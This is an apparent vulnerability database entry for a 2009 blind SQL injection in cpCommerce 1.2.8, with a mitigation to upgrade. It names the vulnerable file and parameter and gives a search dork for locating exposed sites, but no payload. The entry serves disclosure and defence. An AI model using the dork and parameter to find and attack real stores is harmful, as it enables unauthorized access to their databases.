Vendor: cpCommerce
By: NoGe
CVSS: 8.8 HIGH
Blind SQL Injection
CWE: 89
Product Name: cpCommerce
Affected Version From: 1.2.8
Affected Version To: 1.2.8
Patch Exists: YES
Related CWE: N/A
CPE: a:cpcommerce:cpcommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
cpCommerce 1.2.8 Blind SQL Injection Vulnerability
cpCommerce version 1.2.8 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'id_document' in the 'document.php' file. The dork for this vulnerability is 'Powered by cpcommerce'.
Mitigation:
Upgrade to the latest version of cpCommerce